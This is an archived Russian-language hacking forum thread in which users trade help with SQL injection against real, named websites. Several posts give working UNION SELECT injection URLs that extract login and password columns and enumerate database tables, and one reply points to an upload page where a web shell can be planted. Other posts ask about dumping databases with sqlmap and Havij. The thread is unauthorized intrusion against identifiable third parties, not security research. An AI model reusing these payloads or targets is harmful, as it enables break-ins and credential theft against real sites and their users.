ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.01.2014, 15:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 5818
Репутация:
0
|
|
Подскажите пример реализации
https://www.site.com/login
POST
PARAM: firstN=&lastN=
DB: ORACLE
c чего начать?
|
|
|
|

20.01.2014, 15:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 15642
Репутация:
6
|
|
Сообщение от psihoz26
psihoz26 said:
Посоветуйте пожалуйста нормальный гуи для sqlmap
Особенно важна поддержка иньекций в куках
В разделе ИЗБРАННОЕ смотрел?
|
|
|
|

20.01.2014, 18:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 20084
Репутация:
0
|
|
Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap
|
|
|
|

20.01.2014, 18:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 15642
Репутация:
6
|
|
Сообщение от erwap
erwap said:
Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap
Уверен,что там есть данные?ручками пробовал?
|
|
|
|

21.01.2014, 11:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от erwap
erwap said:
Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap
А вы таки вообще уверены, что в записях с этими полями поля по факту не пустые? И какие у вас привилегии на системе?
|
|
|
|

21.01.2014, 18:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Есть сайт со скулей
Код:
Code:
http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+users+--+
и админка но ни одна из учёток не подходит. Расскажите, в чём подвог?
2. Не подбирается кол-во столбцов.
Код:
Code:
www.tmk-group.com/structure.php?flr_id=179+and+1=0+order+by+1+--+
|
|
|
|

21.01.2014, 19:11
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме: 70640
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Есть сайт со скулей
Код:
Code:
http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+users+--+
и
админка
но ни одна из учёток не подходит. Расскажите, в чём подвог?
http://kerch.biz/upload.php
Спокойно шелл грузится.
|
|
|

22.01.2014, 01:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 2871
Репутация:
0
|
|
подскажите по базе SAP MaxDB
не могу найти статей про это базу как скуль ижект делать в ней.
блинд
|
|
|
|

22.01.2014, 21:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
В общем есть проблемная скуля
Код:
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
На которой видны пинтабельные поля, но получить от них что-либо (нр. version() ) выбивает чистую страницу. Расскажите, что за фигня!
|
|
|
|

23.01.2014, 00:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Сообщение от OxoTnik
OxoTnik said:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,@@version,4,5,6,7,8,9,10, 11,12,13,14,15,16+--+
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,tabLe_name,6,7,8,9,10 ,11,12,13,14,15,16++from+information_scheMa.tables--+
// Остальные ответы удалил, так как мы все дублировали этот пост =) Да, там фильтруются скобки
// BigBear
Спасибо ребятулечки, но там другая фигня получилась.
Код:
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,Column_name,6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+2,1+--+
вообщем есть столбец username & password, но туда не пускает, мб зарегистрироваться надо. А насчёт скобок тоже отдельное спасибо, но можно поочередно вытянуть используя их.
II.
Код:
Code:
http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
- не выводит пентабельное поле.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|